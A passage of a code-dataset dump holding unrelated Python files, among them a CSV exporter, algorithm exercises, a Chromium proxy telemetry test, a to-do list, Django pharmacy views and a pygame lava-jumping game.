csv.\"\"\"\nimport itertools\nimport os\nfrom typing import List\n\nimport numpy as np\nimport pandas\nimport tqdm\n\nfrom sampling.sample import Sample\n\n\ndef save_as_csv(samples: List[Sample],\n imgs: np.ndarray, # Using separate numpy array for images as np.uint8\n det_labels: np.ndarray,\n datasets_folder: str,\n dataset: str,\n split: str):\n \"\"\"Perist the samples, including all auxiliary information, to a csv file.\"\"\"\n coordinates = list(itertools.product(list(range(28)), list(range(28))))\n entries = []\n for i, sample in tqdm.tqdm(enumerate(samples), desc='Creating CSV rows'):\n new_entry = {\n 'dataset': dataset,\n 'split': split,\n 'class_1': sample.class_1,\n 'class_2': sample.class_2,\n 'p(class_1)': sample.label_1,\n 'p(class_2)': sample.label_2,\n 'det_label': det_labels[i],\n 'autoencoder_id': sample.autoencoder_id,\n }\n for coord in coordinates:\n new_entry['x_{}'.format(coord)] = imgs[i][coord]\n entries.append(new_entry)\n\n df = pandas.DataFrame(entries)\n if not os.path.exists(datasets_folder):\n os.makedirs(datasets_folder)\n df.to_csv(os.path.join(datasets_folder, f\"{dataset}-{split}.csv\"), index=True)\n","repo_name":"testingautomated-usi/ambguess-src","sub_path":"ambiguess/packing/csv_exports.py","file_name":"csv_exports.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27097891135","text":"import sys\nsys.stdin=open(\"../input.txt\",\"r\")\ndef DFS(v):\n global res\n if v==m:\n for x in res:\n print(x,end=\" \")\n print()\n else:\n for i in range(1,n+1): \n if ch[i]==0:\n ch[i]=1\n res[v]=i \n DFS(v+1)\n ch[i]=0\n\nif __name__ == \"__main__\":\n n,m=map(int,input().split())\n res=[0]*m\n ch=[0]*(n+1)\n DFS(0)","repo_name":"areum514/Algorithm","sub_path":"section6/8_순열구하기.py","file_name":"8_순열구하기.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31363034091","text":"#!../../anaconda2/bin/python\n\n\nimport os\nimport shutil\nimport random\nimport re\nimport json\nimport pickle\n\n#load feature data with filename\nfeatData = pickle.load( open( \"4_10_batch1_findAnotData.p\", \"rb\" ) )\n\n#take only one filename to test\ncorpusFilename = featData[1]['filename']\n\n#get adjudication filename: /uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/eHostWorkSpace/4_10_batch1/corpus/9_jd_246_1523844165_8ck5iq_trees.txt\nparseList = corpusFilename.split('/')\nadjudicationFilename = '/'.join(parseList[0:-2])+'/adjudication/'+parseList[-1]+'.knowtator.xml'\nsubreddit = parseList[-1].split('_')[-1].replace('.txt','')\n\n#read annotation and corpus data\nimport reader\nanotDicList = reader.annotFileReader(adjudicationFilename)\nfor t in anotDicList:\n\tprint(t)\ncorpusData = reader.corpusFileReader(corpusFilename)\n#print(corpusData)\n\n#Rule based\nimport RegExp \n#import re\n\nruleBasedAnnotList = RegExp.regExDetect_subreddit(corpusData, subreddit)\nprint(subreddit)\n#print(anotDicList)\nprint('-----------')\nfor t in ruleBasedAnnotList:\n\tprint(t)\n#print(ruleBasedAnnotList)\n\ncorrectNum=0\nfor r in ruleBasedAnnotList:\n\trStart = r['start']\n\trEnd = r['end']\n\trCat = r['category']\n\tfor a in anotDicList:\n\t\taStart = a['start']\n\t\taEnd = a['end']\n\t\taCat = a['class']\n\t\tif min(aEnd,rEnd)-max(aStart,rStart)>0 and aCat==rCat:\n\t\t\tcorrectNum = correctNum+1\n\nprint('Average Precision:', correctNum, correctNum/float(len(ruleBasedAnnotList)))\t\t\t\n","repo_name":"grace-mengke-hu/TRIANGULUM","sub_path":"Annotation/testRulebased.py","file_name":"testRulebased.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12300830685","text":"from common.chrome_proxy_shared_page_state import ChromeProxySharedPageState\nfrom telemetry.page import page as page_module\nfrom telemetry import story\n\n\nclass BlockOncePage(page_module.Page):\n\n def __init__(self, url, page_set):\n super(BlockOncePage, self).__init__(url=url,page_set=page_set,\n shared_page_state_class=ChromeProxySharedPageState)\n\n def RunNavigateSteps(self, action_runner):\n super(BlockOncePage, self).RunNavigateSteps(action_runner)\n # Test block-once on a POST request.\n # Ensure that a subsequent request uses the data reduction proxy.\n action_runner.ExecuteJavaScript('''\n (function() {\n window.post_request_completed = false;\n var request = new XMLHttpRequest();\n request.open(\"POST\",\n \"http://chromeproxy-test.appspot.com/default?\" +\n \"respBody=T0s=&respHeader=eyJBY2Nlc3MtQ29udHJvbC1BbGxvdy1Pcml\" +\n \"naW4iOlsiKiJdfQ==&respStatus=200&flywheelAction=block-once\");\n request.onload = function() {\n window.post_request_completed = true;\n var viaProxyRequest = new XMLHttpRequest();\n viaProxyRequest.open(\"GET\",\n \"http://check.googlezip.net/image.png\");\n viaProxyRequest.send();\n };\n request.send();\n })();\n ''')\n action_runner.WaitForJavaScriptCondition(\n \"window.post_request_completed == true\", timeout=30)\n\nclass BlockOnceStorySet(story.StorySet):\n\n \"\"\" Chrome proxy test sites \"\"\"\n\n def __init__(self):\n super(BlockOnceStorySet, self).__init__()\n\n # Test block-once for a GET request.\n urls_list = [\n 'http://check.googlezip.net/blocksingle/',\n ]\n\n for url in urls_list:\n self.AddStory(BlockOncePage(url, self))\n","repo_name":"kiwibrowser/src","sub_path":"tools/chrome_proxy/integration_tests/chrome_proxy_pagesets/block_once.py","file_name":"block_once.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"22132659463","text":"import os\r\nimport pickle\r\nimport datetime\r\n\r\n# Define a class to represent a task\r\nclass Task:\r\n def __init__(self, description, due_date=None, priority=1, completed=False):\r\n self.description = description\r\n self.due_date = due_date\r\n self.priority = priority\r\n self.completed = completed\r\n \r\n def __repr__(self):\r\n return f\"{self.description} - Due: {self.due_date.strftime('%m/%d/%Y')} - Priority: {self.priority}\"\r\n\r\n\r\n# Define a class to manage the to-do list\r\nclass ToDoList:\r\n def __init__(self):\r\n self.tasks = []\r\n self.filename = \"tasks.pkl\"\r\n self.load_tasks()\r\n \r\n def add_task(self):\r\n description = input(\"Enter task description: \")\r\n due_date_str = input(\"Enter due date (MM/DD/YYYY) or leave blank: \")\r\n if due_date_str:\r\n due_date = datetime.datetime.strptime(due_date_str, \"%m/%d/%Y\")\r\n else:\r\n due_date = None\r\n priority = int(input(\"Enter priority (1-5, 5 is highest): \"))\r\n task = Task(description, due_date, priority)\r\n self.tasks.append(task)\r\n print(\"Task added successfully.\")\r\n \r\n def list_tasks(self):\r\n print(\"Tasks:\")\r\n for i, task in enumerate(self.tasks):\r\n print(f\"{i+1}. {task}\")\r\n \r\n def complete_task(self):\r\n self.list_tasks()\r\n choice = int(input(\"Enter the number of the task to mark as completed: \"))\r\n if 1 <= choice <= len(self.tasks):\r\n task = self.tasks[choice-1]\r\n task.completed = True\r\n print(\"Task marked as completed.\")\r\n else:\r\n print(\"Invalid choice.\")\r\n \r\n def remove_task(self):\r\n self.list_tasks()\r\n choice = int(input(\"Enter the number of the task to remove: \"))\r\n if 1 <= choice <= len(self.tasks):\r\n task = self.tasks[choice-1]\r\n self.tasks.remove(task)\r\n print(\"Task removed successfully.\")\r\n else:\r\n print(\"Invalid choice.\")\r\n \r\n def save_tasks(self):\r\n with open(self.filename, \"wb\") as f:\r\n pickle.dump(self.tasks, f)\r\n \r\n def load_tasks(self):\r\n if os.path.exists(self.filename):\r\n with open(self.filename, \"rb\") as f:\r\n self.tasks = pickle.load(f)\r\n \r\n def sort_tasks(self):\r\n self.tasks.sort(key=lambda task: (task.completed, task.priority, task.due_date))\r\n \r\n def display_menu(self):\r\n print(\"\\nTo-Do List Manager\\n\")\r\n print(\"1. Add Task\")\r\n print(\"2. List Tasks\")\r\n print(\"3. Mark Task as Completed\")\r\n print(\"4. Remove Task\")\r\n print(\"5. Save Tasks\")\r\n print(\"6. Exit\")\r\n \r\n def run(self):\r\n while True:\r\n self.sort_tasks()\r\n self.display_menu()\r\n choice = input(\"Enter your choice (1-6): \")\r\n if choice == \"1\":\r\n self.add_task()\r\n elif choice == \"2\":\r\n self.list_tasks()\r\n elif choice == \"3\":\r\n self.complete_task()\r\n elif choice == \"4\":\r\n self.remove_task()\r\n elif choice == \"5\":\r\n self.save_tasks()\r\n elif choice == \"6\":\r\n break\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n\r\n# Create a to-do list and run the program\r\ntodo_list = ToDoList()\r\ntodo_list.run()","repo_name":"abolfazl9403/python-project","sub_path":"to do list manager.py","file_name":"to do list manager.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"27322091971","text":"\nlstNumber = [4, 3, 2, 1]\nclosest = 0\nnumDiff = lstNumber[0]\n\nfor num in lstNumber:\n diff = 0 - num\n diff = abs(diff)\n if diff < numDiff:\n numDiff = diff\n closest = num\n\nprint (\"Closest to 0 is \", closest)\n\n\n","repo_name":"ArjunAranetaCodes/MoreCodes-Python","sub_path":"Lists/problem20.py","file_name":"problem20.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"20870928590","text":"from django.db import connection\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom inventory.models import sells\nfrom items.models import Item\nfrom pharmacy.models import Pharmacy\nfrom customer.models import customer\nfrom cart.models import contains\nfrom customer.models import address_list\nfrom pharmacy.models import contact_pharmacy\nitem_OTC = []\nfrom cart.views import addItem\n\ndef showSearch(request):\n print(\"hello\")\n return render(request,'items/search.html')\n\n\ndef showSearchResult(request):\n name=request.session['name']\n user=customer.objects.get(username=name)\n cart = contains.objects.filter(cart_id=user)\n count = 0\n for cart_id in cart:\n count = count + 1\n print(count)\n\n print(request)\n\n if request.method == 'POST':\n print('request')\n itemname = request.POST.get('search')\n try:\n status = Item.objects.filter(item_name__icontains=itemname)\n print('hi')\n print(status)\n for a in status:\n\n if a.otc_or_not is True:\n print ('loop')\n print('if')\n item_OTC .append(a)\n print (item_OTC)\n else:\n continue\n print(status)\n return render(request,'items/search_result.html',{'items': item_OTC,'user':user,'items_in_cart':count})\n\n except:\n print ('except')\n return render(request, 'items/search_result.html', {'user':user,'items_in_cart':count})\n\n else:\n print ('o else')\n return render(request, 'items/search_result.html', {'user':user,'items_in_cart':count})\n\ndef showSearchResultPharmacy(request,item_id):\n name = request.session['name']\n user = customer.objects.get(username=name)\n address_instance = address_list.objects.filter(username=user, default=True).first()\n cart = contains.objects.filter(cart_id=user)\n count = 0\n for cart_id in cart:\n count = count + 1\n print(count)\n set_of_pharmacy = []\n item_info_sells = []\n t=sells.objects.filter(item_id=item_id)\n item=Item.objects.get(item_id=item_id)\n cursor=connection.cursor()\n cursor.execute(\"SELECT * FROM pharmacy_Pharmacy m INNER JOIN inventory_sells s on m.pharmacy_id=s.pharmacy_id_id JOIN pharmacy_contact_pharmacy p on m.pharmacy_id=p.pharmacy_id where p.default=true and s.item_id_id=%s\", [item_id])\n for row in cursor.fetchall():\n if row[10]-address_instance.address_pincode<=3 and row[13]>0:\n set_of_pharmacy.append(row)\n print (set_of_pharmacy)\n context={'item':item,'pharmacy':set_of_pharmacy,'user':user,'items_in_cart':count}\n\n return render(request,'items/pharmacy_having_item.html',context=context)\n\n","repo_name":"Shivam2302/OnlinePharmacy","sub_path":"Code/OnlinePharmacy/items/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37019221681","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\fittingGhost\\ghostFittingUtil.py\r\nfrom dogma.items.shipFittableDogmaItem import ShipFittableDogmaItem\r\nimport evetypes\r\nimport util\r\nOFFLINE = 0\r\nONLINE = 1\r\nACTIVE = 2\r\nOVERHEATED = 3\r\n\r\nclass GhostFittingDataObject(object):\r\n\r\n def __init__(self, locationID, flagID, typeID, ownerID = None, number = None):\r\n self.locationID = locationID\r\n self.flagID = flagID\r\n self.typeID = typeID\r\n self.number = number\r\n self.itemID = self.GetItemKey()\r\n self.categoryID = evetypes.GetCategoryID(typeID)\r\n self.groupID = evetypes.GetGroupID(typeID)\r\n self.ownerID = session.charid\r\n\r\n def GetItemKey(self):\r\n if self.number is None:\r\n return '%s_%s' % (self.flagID, self.typeID)\r\n else:\r\n return '%s_%s_%s' % (self.flagID, self.typeID, self.number)\r\n\r\n def SetNumber(self, number):\r\n self.number = number\r\n self.itemID = self.GetItemKey()\r\n\r\n\r\nclass FakeGhostFittingDogmaItem(object):\r\n pass\r\n\r\n\r\nclass GhostFittingDogmaItem(ShipFittableDogmaItem):\r\n __guid__ = 'GhostFittingDogmaItem'\r\n\r\n def __init__(self, dogmaLocation, ghostFittingItem, ownerID):\r\n item = FakeGhostFittingDogmaItem()\r\n item.itemID = ghostFittingItem.GetItemKey()\r\n item.typeID = ghostFittingItem.typeID\r\n item.groupID = evetypes.GetGroupID(item.typeID)\r\n item.categoryID = evetypes.GetCategoryID(item.typeID)\r\n super(GhostFittingDogmaItem, self).__init__(dogmaLocation, item)\r\n self.ownerID = ownerID\r\n self.fittedItems = {}\r\n self.subLocations = {}\r\n\r\n def Load(self):\r\n self.attributes = {}\r\n\r\n def Unload(self):\r\n super(GhostFittingDogmaItem, self).Unload()\r\n self.dogmaLocation.RemoveSubLocationFromLocation(self.itemID)\r\n\r\n def SetLocation(self, locationID, locationDogmaItem, flagID):\r\n super(GhostFittingDogmaItem, self).SetLocation(locationID, locationDogmaItem, flagID)\r\n\r\n def UnsetLocation(self, locationDogmaItem):\r\n super(GhostFittingDogmaItem, self).UnsetLocation(locationDogmaItem)\r\n locationDogmaItem.RemoveSubLocation(self.itemID)\r\n\r\n def GetEnvironmentInfo(self):\r\n otherID = None\r\n if self.location is not None:\r\n otherID = self.dogmaLocation.GetSlotOther(self.location.itemID, self.flagID)\r\n return util.KeyVal(itemID=self.itemID, shipID=self.GetShipID(), charID=self.GetPilot(), otherID=otherID, targetID=None, effectID=None)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/shared/fittingGhost/ghostFittingUtil.py","file_name":"ghostFittingUtil.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15524343675","text":"import turtle as t\nfrom turtle import Screen\nfrom random import randint, choice\nfrom colors import random_color\n\ndef main():\n total_steps = int(input(f\"How many steps the drunken will make? Type a number: \"))\n # borracho = RandomWalk()\n # borracho.walk()\n\n borracho = t.Turtle()\n borracho.width(4)\n borracho.speed(0)\n t.colormode(255)\n step_size = 15\n\n for _ in range(total_steps):\n towards = choice([0, 270, 180, 90])\n borracho.setheading(towards)\n borracho.pencolor(random_color)\n borracho.fd(step_size)\n\n screen = Screen()\n screen.screensize(600)\n screen.exitonclick()\n\n\n# class RandomWalk:\n#\n# def __init__(self, total_steps):\n# self.total_steps = total_steps\n# self.color = colors[randint(0, 8)]\n# self.step = 10\n#\n# def walk(self):\n# my_turtle = Turtle()\n# towards = choice([0, 270, 180, 90])\n# print(towards)\n# for _ in range(total_steps):\n# my_turtle.setheading(self, towards)\n# my_turtle.pencolor(self.color)\n# my_turtle.fd(self.step)\n\n\nif __name__ == '__main__':\n main()","repo_name":"ODCenteno/python_100days","sub_path":"day_18-canva-dots/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22795397630","text":"\nfrom Interface import Interface\nfrom ClientTable import ClientTable\nfrom Errors import DNEError, NoFundsError, NonAccError, NoFundsSysError, AccDoubleJeopardyError\nfrom System import System\n\nclass TESTInterface(Interface):\n\tdef __init__(self, clientTable = ClientTable(), system = System(0.00)):\n\t\tself.__clientTable = clientTable\n\t\tself.__system = system\n\n\t# raises DNEError if account doesn't exist\n\tdef inquire(self, client):\n\t\twhich = input(\"For which account?:\")\n\t\tbalance = client.inquire(which)\n\t\tprint(\"Balance = ${}\".format(balance))\n\n\t# raises\n\t# NoFundsSysError if system has insufficient funds\n\t# ValueError if amt can't be parsed\n\t# NonAccError if acc doesn't exist in client\n\tdef withdraw(self, client):\n\t\tamt = input(\"How much?:\")\n\t\tamt = float(amt)\n\t\tamt = round(amt, 2)\n\n\t\twhich = input(\"For which account?:\")\n\t\tself.__system.withdraw(amt)\n\t\tclient.withdraw(which, amt)\n\n\t# raises\n\t# ValueError if input is off\n\t# DNEError if account does not exist\n\tdef deposit(self, client):\n\t\tamt = input(\"How much?\")\n\t\tamt = float(amt)\n\n\t\twhich = input(\"For which account?:\")\n\t\tclient.deposit(which, amt)\n\t\tself.__system.deposit(amt)\n\n\t# raises\n\t# Value Error if can't parse value\n\t# NoFundError if there are no funds in fromAcc\n\t# NonAccError if one of the accounts doesn't exist\n\tdef transfer(self, client):\n\n\t\tamt = input(\"How much?\")\n\t\tamt = float(amt)\n\n\t\tfromAcc = input(\"From which account?:\")\n\t\ttoAcc = input(\"To which account?\")\n\t\tclient.transfer(fromAcc, toAcc, amt)\n\n\n\tdef list(self, client):\n\t\tprint(\"savings\")\n\t\tprint(\"checking\")\n\t\totherAccs = client.otherAccounts()\n\t\tfor name in otherAccs:\n\t\t\tprint(name)\n\n\t# Raises\n\t# AccDoubleJeopardyError if acc_name already exists\n\tdef addAcc(self, client):\n\t\tacc_name = input(\"Under what name?:\").strip()\n\t\tclient.addAcc(acc_name)\n\n\n\tdef run(self):\n\n\t\twhile True:\n\t\t\tuser = input(\"User Name >>\")\n\t\t\tpassword = input(\"Password >>\")\n\n\t\t\ttry:\n\t\t\t\tclient = self.__clientTable.get_client(user, password)\n\t\t\t\tprint(\"Hello {}!\".format(client.user))\n\t\t\t\tbreak\n\t\t\texcept DNEError:\n\t\t\t\tprint(\"Invalid Username or Password\")\n\n\n\t\twhile True:\n\t\t\tprint(\"------------\")\n\t\t\tprint(\"Options: \")\n\t\t\tprint(\"1) Inquire\")\n\t\t\tprint(\"2) Withdraw\")\n\t\t\tprint(\"3) Deposit\")\n\t\t\tprint(\"4) Transfer\") \n\t\t\tprint(\"5) List Accounts\")\n\t\t\tprint(\"6) Add Account\")\n\t\t\tprint(\"q) Quit\")\n\t\t\tprint(\"------------\")\n\t\t\tselection = input(\">>\").strip()\n\n\t\t\t# Inquire\n\t\t\tif selection == \"1\":\n\t\t\t\ttry: self.inquire(client)\n\t\t\t\texcept DNEError:\n\t\t\t\t\tprint(\"Invalid Selection\")\n\t\t\t\texcept NonAccError:\n\t\t\t\t\tprint(\"Invalid Selection\")\n\n\n\t\t\t# Withdraw\n\t\t\telif selection == \"2\":\n\t\t\t\ttry: self.withdraw(client)\n\t\t\t\texcept NoFundsSysError:\n\t\t\t\t\tprint(\"Insufficient Funds in System\")\n\t\t\t\texcept NoFundsError:\n\t\t\t\t\tprint(\"Insufficient Funds in Account\")\n\t\t\t\texcept NonAccError:\n\t\t\t\t\tprint(\"Nonexistent Account\")\n\n\t\t\t# Deposit\n\t\t\telif selection == \"3\":\n\t\t\t\ttry: self.deposit(client)\n\t\t\t\texcept ValueError:\n\t\t\t\t\tprint(\"Invalid Input. Resetting.\")\n\t\t\t\texcept NonAccError:\n\t\t\t\t\tprint(\"Nonexistent Account\")\n\n\n\t\t\t# Transfer\n\t\t\telif selection == \"4\":\n\t\t\t\ttry: self.transfer(client)\n\t\t\t\texcept ValueError:\n\t\t\t\t\tprint(\"Invalid Input. Resetting\")\n\t\t\t\texcept NoFundsError:\n\t\t\t\t\tprint(\"Insufficient Funds. Resetting.\")\n\t\t\t\texcept NonAccError:\n\t\t\t\t\tprint(\"Invalid Account Name. Resetting.\")\n\n\t\t\t# List Accounts\n\t\t\telif selection == \"5\":\n\t\t\t\tself.list(client)\n\n\t\t\t# Add Account\n\t\t\telif selection ==\"6\":\n\t\t\t\ttry: self.addAcc(client)\n\t\t\t\texcept AccDoubleJeopardyError:\n\t\t\t\t\tprint(\"Account already exists\")\n\n\n\t\t\telif selection == \"q\":\n\t\t\t\tbreak\n\n\t\t\telse:\n\t\t\t\tprint(\"Invalid Selection. Resetting.\")\n\n# Test run\nif __name__ == '__main__':\n\tsys = System(1000)\n\tct = ClientTable()\n\tct.add_client(\"JimmyJenk\", \"BillyBob\")\n\tct.add_client(\"Zack\", \"Yikes\")\n\tct.add_client(\"Jay\", \"Swag\")\n\tinterface = TESTInterface(ct, sys)\n\tinterface.run()","repo_name":"ZackFra/Bank_example","sub_path":"TESTInterface.py","file_name":"TESTInterface.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22626769505","text":"import os,sys\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n'''\nAbove two lines of code are a hack inorder to keep gamelib in a common\nlocation where I can update for all games. If you copy gamelib.py into\nthe same folder as the game then you don't need these lines and can simply\ndelete them.\n'''\n\nfrom gamelib import *\n\n###########################\ndef drawScore():\n x = game.width / 2\n for d in str(game.score):\n numbers[int(d)].moveTo(x,50)\n numbers[int(d)].draw()\n x += numbers[int(d)].width\n \n#####################\ndef intro():\n titleA = Image(\"images\\\\title1a.png\",game)\n titleA.y -= 110\n titleB = Image(\"images\\\\title1b.png\",game)\n titleB.y -=10\n\n platforms[0].y += 150\n hero.moveTo(platforms[0].x,platforms[0].y-platforms[0].height/2-hero.height/2 + 18)\n\n platforms[0].setSpeed(6,90)\n\n hsemblem.moveTo(game.width - hsemblem.width / 2 - 40, game.height - hsemblem.height / 2 - 40)\n infoemblem.moveTo(infoemblem.width / 2 + 40, game.height - infoemblem.height / 2 - 40)\n game.time = 1\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",2)\n titleA.draw()\n titleB.draw()\n hsemblem.draw()\n infoemblem.draw()\n \n if game.time <= 0:\n game.drawText(\"Press [SPACE] to Start\",game.width/2-175,game.height / 2 + 30,Font(black,32,red,'mael.ttf'))\n if keys.Pressed[K_SPACE]:\n game.over = True\n \n platforms[0].move(True)\n hero.moveTo(platforms[0].x,platforms[0].y-platforms[0].height/2-hero.height/2 + 20)\n c = red\n if pointer.collidedWith(hsemblem) and mouse.LeftButton:\n displayHighScore()\n elif pointer.collidedWith(hsemblem):\n c = yellow\n game.drawText(\"High Score\",game.width - hsemblem.width / 2 - 95, game.height - hsemblem.height / 2 + 10 ,Font(black,20,c,'mael.ttf'))\n \n c = red\n if pointer.collidedWith(infoemblem) and mouse.LeftButton:\n about()\n elif pointer.collidedWith(infoemblem):\n c = yellow\n game.drawText(\"About\",infoemblem.width / 2 + 15, game.height - infoemblem.height / 2 + 10 ,Font(black,20,c,'mael.ttf'))\n \n pointer.moveTo(mouse.x + pointer.width /2 - 10,mouse.y + pointer.height/2 - 10)\n game.update(30)\n \n game.over = False\n###########################\ndef newHighScore():\n nhstitle = Image(\"images\\\\newhighscore.png\",game)\n nhstitle.y = 50\n global last\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n\n game.drawText(\"Press [ESC] to Quit\",game.width/2-175,game.height * .75,Font(black,32,red,'mael.ttf'))\n \n nhstitle.draw()\n \n if keys.Pressed[K_ESCAPE]:\n game.over = True\n\n game.update(30)\n game.over = False\n###########################\ndef displayHighScore():\n hstitle = Image(\"images\\\\highscore.png\",game)\n hstitle.y = 50\n global last\n game.time = 2\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n hstitle.draw()\n\n if game.time <= 0:\n c = red\n if pointer.collidedWith(returnemblem) and mouse.LeftButton:\n game.over = True\n elif pointer.collidedWith(returnemblem):\n c = yellow\n game.drawText(\"Return\",game.width /2 - returnemblem.width / 2 + 15, game.height - returnemblem.height / 2 + 10 ,Font(black,20,c,'mael.ttf'))\n returnemblem.draw()\n \n pointer.moveTo(mouse.x + pointer.width /2 - 10,mouse.y + pointer.height/2 - 10)\n \n if keys.Pressed[K_ESCAPE]:\n game.over = True\n\n game.update(30)\n game.over = False\n###########################\ndef about():\n abouttitle = Image(\"images\\\\about.png\",game)\n abouttitle.y = 50\n global last\n game.time = 1\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n\n abouttitle.draw()\n \n if game.time <= 0:\n c = red\n if pointer.collidedWith(returnemblem) and mouse.LeftButton:\n game.over = True\n elif pointer.collidedWith(returnemblem):\n c = yellow\n game.drawText(\"Return\",game.width / 2 - returnemblem.width / 2 + 15, game.height - returnemblem.height / 2 + 10 ,Font(black,20,c,'mael.ttf'))\n returnemblem.draw()\n \n pointer.moveTo(mouse.x + pointer.width /2 - 10,mouse.y + pointer.height/2 - 10)\n textFont = Font(black,24,red,'mael.ttf')\n game.drawText(\"Help Glitch escape the volcano by jumping across\",100,120,textFont)\n game.drawText(\"the floating platforms to the teleportation rune.\",100,160,textFont)\n game.drawText(\"Be wary of the various perils that challenge your escape.\",100,200,textFont)\n game.drawText(\"Use the arrow keys to move and the spacebar to jump\",100,240,textFont)\n\n if keys.Pressed[K_ESCAPE]:\n game.over = True\n\n game.update(30)\n game.over = False\n###########################\ndef levelOne():\n jumping = False\n factor = 1\n landed = False\n currentrocklanded = -1\n challengeSpeed = 2\n global last\n fire.moveTo(randint(fire.width,game.width-fire.width),-fire.height)\n fire.speed = randint(4,8)\n \n dragon.moveTo(game.width + dragon.width / 2 + 20,randint(dragon.width/2,game.height-dragon.height/2))\n dragon.setSpeed(4,90)\n\n game.playMusic()\n\n #Start Game\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n drawScore()\n \n for obj in world:\n obj.x -= challengeSpeed\n \n onrock = False\n for index, platform in enumerate(platforms):\n platform.draw()\n #Recycle platforms\n if platform.isOffScreen(\"left\"):\n platform.moveTo(platforms[last].x + platforms[last].width + 100,randint(200,300))\n last = index\n #Check if hero is on a rock\n if hero.collidedWith(platform,\"rectangle\") and hero.bottom < platform.top + 15 and hero.x > platform.left and hero.x < platform.right: \n onrock = True\n if not landed and currentrocklanded != index:\n game.score += 1\n landed = True\n landing.play()\n currentrocklanded = index\n \n #Jumping Logic\n if jumping:\n hero.y -= 18 * factor\n factor *= .95\n landed = False\n if factor < .18:\n jumping = False\n factor = 1\n if keys.Pressed[K_SPACE] and onrock and not jumping:\n jumping = True\n jumpingSound.play()\n \n if not onrock:\n hero.y += 5\n \n #Prevent hero going off left side of the screen\n if hero.left <= game.left:\n hero.x = hero.width / 2\n \n if keys.Pressed[K_RIGHT]:\n hero.x += 4 + challengeSpeed\n hero.nextFrame()\n if onrock :#and hero.f in [1,2,8,9]:\n walking.play(250)\n elif keys.Pressed[K_LEFT]:\n hero.x -= 4\n hero.prevFrame()\n if onrock :#and hero.f in [1,2,8,9]:\n walking.play(250)\n else:\n hero.draw()\n\n #Fire and dragon logic\n if game.score >= 10 and game.score < 15: \n fire.y += fire.speed\n fire.draw(False)\n fireSound.play()\n if fire.isOffScreen(\"bottom\") or not fire.visible:\n fire.moveTo(randint(50,game.width-50),-fire.height)\n fire.speed = randint(4,10)\n fire.visible = True\n if hero.collidedWith(fire):\n game.over = True\n if (game.score >= 4 and game.score < 9) or not dragon.isOffScreen():\n dragon.move(False)\n dragonSound.play()\n if dragon.isOffScreen(\"left\"):\n dragon.moveTo(game.width + dragon.width / 2 + 20,randint(dragon.width/2,game.height-dragon.height/2))\n if dragon.collidedWith(hero):\n hero.x -= 6\n\n if hero.isOffScreen(\"bottom\"):\n game.over = True\n splash.play()\n \n game.update(30)\n\n#####################\ndef gameover():\n endtitle = Image(\"images\\\\tgameover.png\",game)\n \n global last\n while True:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n for obj in world:\n obj.x -= 2\n\n for index, platform in enumerate(platforms):\n platform.draw()\n #Recycle platforms\n if platform.isOffScreen(\"left\"):\n platform.moveTo(platforms[last].x + platforms[last].width + 150,randint(200,300))\n last = index\n \n game.drawText(\"Play Again? [Y/N]\",game.width/2-175,game.height * .75,Font(black,32,red,'mael.ttf'))\n \n endtitle.draw()\n \n if keys.Pressed[K_y]:\n game.over = False\n return True\n if keys.Pressed[K_n]:\n return False\n\n game.update(30)\n \n#####################\ngame = Game(1008,440,\"Glitch - The Lava Jumper\")\n\nplatforms = []\nsize = 10\nlast = size -1\n\n#Load objects\nbk = Image(\"images\\\\lavabk2.jpg\",game)\nbk.resizeTo(game.width, game.height)\ngame.setBackground(bk)\n\nhsemblem = Image(\"images\\\\highscoreemblem.png\",game)\nhsemblem.resizeBy(-60)\ninfoemblem = Image(\"images\\\\infoemblem.png\",game)\ninfoemblem.resizeBy(-60)\nreturnemblem = Image(\"images\\\\return3.png\",game)\nreturnemblem.resizeBy(-60)\nreturnemblem.y = game.height - returnemblem.height / 2 - 40\n\npointer = Image(\"images\\\\pointer1.png\",game)\npointer.resizeBy(-80)\nmouse.visible = False\n\nfor times in range(size):\n f = randint(1,3)\n platforms.append(Image(\"images\\\\platform\" + str(f) + \".png\",game))\n\nhero = Animation(\"images\\\\glitch_walker.png\",16,game,832/8,228/2)\nhero.stop()\n\nnumbers = []\nfor n in range(10):\n numbers.append(Image(\"images\\\\t\" + str(n) + \".png\",game))\n\nfire = Animation(\"images\\\\fire.png\",20,game,960/5,768/4,3)\ndragon = 